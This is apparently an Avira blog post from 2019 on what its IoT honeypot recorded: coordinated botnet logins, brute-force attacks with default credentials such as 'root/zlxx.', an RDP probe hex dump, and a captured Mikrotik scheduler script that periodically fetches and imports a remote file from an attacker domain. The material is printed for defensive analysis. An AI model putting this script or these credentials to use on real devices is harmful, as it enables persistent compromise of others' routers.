< BackTuesday, October 22, 2019

Avira honeypot uncovers hacker coordination and stand-alone strategies for attacking your smart devices

Tettnang, Germany, October 22, 2019 - How can an attacker in Country A find and attack a device in Country B? The answer is multi-layered. Attackers frequently use an IP/Port scanning scripts to find open ports on a device, with each open port linked to a corresponding service that communicates over it.

Essentially, the attackers are launching an automated search for open doors and windows. The IP/Port scanner itself can be very basic and simple to write at the entry level – or more complex depending on the attacker’s skill or objectives.

It takes just minutes for an attacker to find a connected device with open ports. The Avira IoT honeypot, with profiles of smart TVs, routers and IP cameras, was attacked within five minutes of going live. In just 30 minutes, it had experienced a range of attacks directed at devices using the telnet, SSH, and any device running on Android.

Sharing is caring

These scanning scripts may appear to be from autonomous botnets, each individually probing for open ports or vulnerable services – but not always. Some attacking botnets are interconnected, with sharing codes and information behind the scene about potential infected hosts. This automated data exchange begins within minutes of a script spotting an open port – and is followed by other botnets starting their assault. Shown below is a sequence of related attacks:

Attack no.

Date

Port

IP

Duration

Username

Password

Description

17357

Wed, 18 Sep 2019 10:48:44 (UTC)

22 (Telnet)

 79.36.*.*

3.827 sec

root

zlxx.

Gathers information. Does not do anything malicious.

17372

Wed, 18 Sep 2019 10:48:49 (UTC)

22 (Telnet)

178.128.*.*

87.575 sec

root

zlxx.

The real attack. Downloads a malware and infects the device

On Wed, 18 Sep 2019 / 10:48:44 (UTC) someone from Italy (more accurately a script) successfully logged into the honeypot with the username/password combination of "root" and "zlxx."  This information was immediately shared with others. Five seconds later, someone from Singapore logged in with the same credential and infected the device.

This data sharing and attack coordination shows that attackers have succeeded in a basic division of labor and establishing inter-bot communication. Their first attack phase is to discover vulnerable devices and find a way in. The second phase is the actual device infection and gaining persistence.

Blind Shooting - Brute attacks:

Sharing data is the exception at the moment. Sometimes an entire attack is conducted in one session. This is essentially a brute-force shotgun attack in the dark where all devices are targeted, exposed and vulnerable ones take the damage, and the rest survive. Below are three actual examples of brute-force attacks.

Episode one:

We observed an attack on Wed, 18 Sep 2019 11:32:59 (UTC) from Ireland:

Attack no.

Date

Port

IP

Duration

Username

Password

Description

17501

Wed, 18 Sep 2019 11:32:59 (UTC)

23 (SSH)

 185.234.*.*

38.482 sec

Root

nosoup4u

Downloads a malware and infects the device.

If we look at the prior and subsequent connections to the honeypot, we see that this attack came out of the blue. Someone just logged in, infected the system and left. 

Attack no.

Date

Port

IP

Duration

Username

Password

Description

7193

Tue, 17 Sep 2019 15:47:29 (UTC)

23 (SSH)

 185.234. .*.*

38.117 sec

Root

nosoup4u

Downloads a malware and infects the device.

The attacker appears to have randomly or sequentially selected its victims and attacked them without even changing the username/password combination. Analysis of the used credentials reveals that these are the default credentials for DreamPlug routers. While every router gets the attack, it only hurts DreamPlug routers.

Episode two:

Attackers are also mixing ports and services in the blind hope of finding a vulnerable target. The honeypot caught an incoming attack on port 5555, the default port for ADB. However, the attack itself did not comply with the ADB protocol. Researchers dumped the attacked vector to find out more:

  • 03 00 00 2F 2A E0 00 00  00 00 00 43 6F 6F 6B 69  .../*......Cooki 
  • 0010  65 3A 20 6D 73 74 73 68  61 73 68 3D 41 64 6D 69  e: mstshash=Admi 
  • 0020  6E 69 73 74 72 0D 0A 01  00 08 00 01 00 00 00     nistr..........

Their detective work revealed that this was an attack targeting RDP (Remote Desktop Protocol) which usually originates from Russia. However, the attacking vector had nothing to do with ADB (Android Debug Bridge). The attackers simply saw an open port, sent a blind attack targeting RDP with the hope that it would find a RDP server on the other end.

Episode three:

Similar to episode two, the honeypot caught another attack on SSH – a service used almost everywhere, from huge mainframes, servers, enterprises, routers, IP cameras, and smartphones.

/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write

That is a malicious Mikrotik script which only targets Mikrotik devices and has no effect on those from other manufacturers. Again, a shotgun type approach which can only work a fraction of the time.

Attackers are looking, sharing, and acting

Attackers find your device because they are always looking for open ports and vulnerable devices. Every minute, the Avira honeypot collects almost ten attacks - an average of 14,125 attacks each day on just one individual device. An open port is an invitation that will not be refused.

Sharing is increasingly going to be the name of the game. Attackers have learned how to share data about your devices and this will raise the risks for. Armed with info on open ports, attacks will happen – either a more subtle coordinated approach or a brute force attack. This attack strategy is indirectly supported by device manufacturers not implementing security into product design with blank and weak default passwords and poor device installation processes. 

Block attackers at the doorway with Avira

The lack of smart device security is systemic. A substantial number of smart devices have not been built with security in mind. It’s also not possible for the average user to make many of the needed security changes.

This is why Avira has developed SafeThings™ -- comprehensive protection for all internet connected devices in the home. For more information on Avira insights into smart device security and on how Avira SafeThings helps ISPs and router manufacturers protect their customers, please contact us at #MWC19 Los Angeles - South Hall #2540.


Important: Your current Windows version is outdated and no longer supported.
For your security, we recommend switching to Windows 10 before downloading Avira software.
Update your Windows version here.
Wichtig: Ihre Windows-Version ist veraltet und wird nicht mehr unterstützt.
Zu Ihrer Sicherheit empfehlen wir Ihnen den Wechsel zu Windows 10 vor dem Download unserer Software.
Hier können Sie Ihr Windows aktualisieren.
Important: Votre version actuelle de Windows est obsolète et n’est plus prise en charge.
Pour votre sécurité, nous vous conseillons de passer à Windows 10 avant de télécharger le logiciel Avira.
Mettez à jour votre version de Windows ici.
Importante: Tu versión actual de Windows está desactualizada y ya no es compatible.
Por tu seguridad, te recomendamos que instales Windows 10 antes de descargar la solución de Avira.
Actualiza aquí tu versión de Windows.
Importante: La tua attuale versione di Windows è obsoleta e non è più supportata.
Per la tua sicurezza, ti consigliamo di passare a Windows 10 prima di scaricare i software Avira.
Aggiorna la tua versione di Windows qui.
Importante: Sua versão atual do Windows está desatualizada e não tem mais suporte.
Para sua segurança, recomendamos que troque para o Windows 10 antes de baixar o software da Avira.
Atualize sua versão do Windows aqui.
Важно: ваша версия Windows устарела и больше не поддерживается.
Из соображений безопасности перед загрузкой ПО Avira мы рекомендуем перейти на Windows 10.
Обновить Windows вы можете здесь.
Belangrijk: Uw huidige versie van Windows is verouderd en wordt niet meer ondersteund.
Voor uw veiligheid adviseren wij u om over te stappen op Windows 10 voordat u de Avira-software downloadt.
Update uw Windows-versie hier.
Önemli: Kullanmakta olduğunuz Windows sürümü eski ve artık desteklenmiyor.
Güvenliğiniz için Avira yazılımını indirmeden önce Windows 10 sürümüne yükseltmenizi öneririz.
Windows sürümünü buradan güncelleyin.
重要 : 現在お使いの Windows バージョンは古いため、サポートされなくなりました。
安全のため、Avira ソフトウェアをダウンロードする前に Windows 10 に切り替えることをお勧めします。
こちらより Windows バージョンをアップデートしてください
重要信息 : 您当前的 Windows 版本已过时,并且不再受支持。
为了安全起见,我们建议您在下载 Avira 软件之前切换到 Windows 10。
在此升级您的 Windows 版本
重要資訊 : 您當前的 Windows 版本已過時,並且不再受支援。
為了安全起見,我們建議您在下載 Avira 軟體之前切換到 Windows 10。
在此升級您的 Windows 版本